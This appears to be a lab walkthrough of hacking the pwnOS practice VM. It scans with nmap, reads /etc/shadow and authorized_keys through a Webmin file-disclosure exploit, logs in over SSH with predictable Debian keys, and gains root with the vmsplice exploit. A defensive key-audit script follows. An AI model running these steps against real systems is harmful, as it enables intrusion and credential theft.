Hacking pwnOS system using Backtrack
Stage 1: Foot Printing (Identifying Live Systems)

nmap [Link]-255

Stage 2: Scanning / Banner Grabbing (Service & Version Identification)

nmap -sV -sS -O [Link]

As we can see, port 10000 (Webmin) and port 22 (Debian OpenSSH / OpenSSL) are listening, so we will search for vulnerabilities related to these two services. Browse [Link] and search for Webmin and OpenSSL.

Stage 3: Gaining Access

Download the Webmin exploit code (Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)) from the following link [Link] and make it an executable file.

Execute the Webmin exploit using the following syntax:

perl [Link] [Link] 10000 /etc/shadow 0

We will observe that the victim system contains users named vmware, obama, osama and momama. Save the output in a file.

Retrieve the authorized_keys files of the vmware, osama, obama and momama users using the same file disclosure vulnerability:

perl [Link] [Link] 10000 /home/vmware/.ssh/authorized_keys
perl [Link] [Link] 10000 /home/obama/.ssh/authorized_keys
perl [Link] [Link] 10000 /home/osama/.ssh/authorized_keys
perl [Link] [Link] 10000 /home/yomama/.ssh/authorized_keys

Save the output of these in a file.

Make use of the OpenSSL vulnerability (predictable RSA keys) to exploit the SSH service. Download the RSA 2048 key dump from the following link [Link] with the help of wget:

wget [Link]

Extract the contents of the tarball using the following command:

tar jxvf debian_ssh_rsa_2048_x86.[Link]
cd rsa/2048

Scan for the public keys obtained from the authorized_keys files using grep:

grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub

grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub

Save the matching private keys and use them for SSH authentication:

ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@[Link]
exit

or, for the vmware user:

ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@[Link]
hostname
uname -a (or uname -r)

We will observe that the system is running Linux kernel 2.6.17. Search for a privilege escalation vulnerability affecting Linux kernel 2.6.17.

Stage 4: Privilege Escalation

Visit [Link], search for Linux kernel 2.6 and download the exploit code (Linux Kernel 2.6.17 - [Link] vmsplice Local Root Exploit) from the following link [Link]. Save the file with a .c extension:

nano vmsplice.c

Compile the C program using gcc:

gcc vmsplice.c -o vmsplice

and execute it:

./vmsplice
whoami
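The authorized_keys step above works because keys generated by the broken Debian OpenSSL RNG are predictable and can be looked up in a dump. The defensive counterpart is to audit every key that grants access against a blacklist of known-weak fingerprints, which is what the following Python script does. It is an added example, not part of the original writeup or of any tool mentioned in it: it builds two constructed ssh-rsa keys (tiny, non-real moduli used only to exercise the wire format), parses an authorized_keys file including a leading options field, computes OpenSSH-style SHA256 fingerprints, and flags entries whose fingerprint is on a constructed blacklist. The user names in the sample file are taken from the writeup; the fingerprint set is assumed to come from a vendor-supplied weak-key list in real use.

```python
"""Audit an authorized_keys file against a blacklist of weak-key fingerprints.

Added example, not code from the original writeup. The keys, the sample
authorized_keys text and the blacklist below are all constructed for
illustration; a real blacklist (such as the lists distributed for the Debian
OpenSSL RNG bug) would be loaded from disk.
"""
import base64
import hashlib
import struct


def _ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH wire-format string (uint32 big-endian length prefix)."""
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(value: int) -> bytes:
    """Encode a non-negative integer as an SSH mpint (leading 0x00 if the high bit is set)."""
    raw = value.to_bytes((value.bit_length() + 7) // 8, "big") or b"\x00"
    if raw[0] & 0x80:
        raw = b"\x00" + raw
    return _ssh_string(raw)


def encode_rsa_public_key(e: int, n: int) -> str:
    """Return the base64 blob of an ssh-rsa public key built from (e, n)."""
    blob = _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)
    return base64.b64encode(blob).decode("ascii")


def blob_key_type(b64_blob: str) -> str:
    """Return the key type embedded in the blob (first SSH string), e.g. 'ssh-rsa'."""
    raw = base64.b64decode(b64_blob)
    (length,) = struct.unpack(">I", raw[:4])
    return raw[4:4 + length].decode("ascii")


def sha256_fingerprint(b64_blob: str) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of SHA-256 over the raw blob."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def parse_authorized_keys(text: str) -> list:
    """Parse authorized_keys lines into (key_type, b64_blob, comment) tuples.

    Blank lines and '#' comments are skipped. A leading options field such as
    'from="10.0.0.5",no-pty' is dropped by discarding tokens until the key type
    (a token starting with 'ssh-' or 'ecdsa-') is reached.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        while parts and not (parts[0].startswith("ssh-") or parts[0].startswith("ecdsa-")):
            parts.pop(0)
        if len(parts) < 2:
            continue
        key_type, blob = parts[0], parts[1]
        comment = " ".join(parts[2:])
        entries.append((key_type, blob, comment))
    return entries


def audit_authorized_keys(text: str, blacklist: set) -> list:
    """Return (key_type, comment, fingerprint) for every key whose fingerprint is blacklisted."""
    findings = []
    for key_type, blob, comment in parse_authorized_keys(text):
        fingerprint = sha256_fingerprint(blob)
        if fingerprint in blacklist:
            findings.append((key_type, comment, fingerprint))
    return findings


# Constructed sample keys: the moduli are tiny and NOT real RSA keys; they only
# exercise the wire-format encoding and the fingerprint computation.
WEAK_KEY = encode_rsa_public_key(65537, 0xC0FFEE0DDBA11)
GOOD_KEY = encode_rsa_public_key(65537, 0xDEADBEEFCAFEF00D)

# Constructed authorized_keys content; user names follow the writeup above.
SAMPLE_AUTHORIZED_KEYS = f"""# constructed sample file
ssh-rsa {WEAK_KEY} obama@pwnos
from="10.0.0.5",no-pty ssh-rsa {GOOD_KEY} vmware@pwnos
"""

# Constructed blacklist: in practice loaded from a list of fingerprints of keys
# produced by the broken RNG.
WEAK_FINGERPRINTS = {sha256_fingerprint(WEAK_KEY)}

if __name__ == "__main__":
    for key_type, comment, fingerprint in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_FINGERPRINTS):
        print(f"BLACKLISTED {key_type} key for '{comment}': {fingerprint}")
```

Run it as a script to see the flagged entry; in an audit, point `audit_authorized_keys` at each user's authorized_keys and at the host's own public keys as well, since the RNG bug affected host keys too.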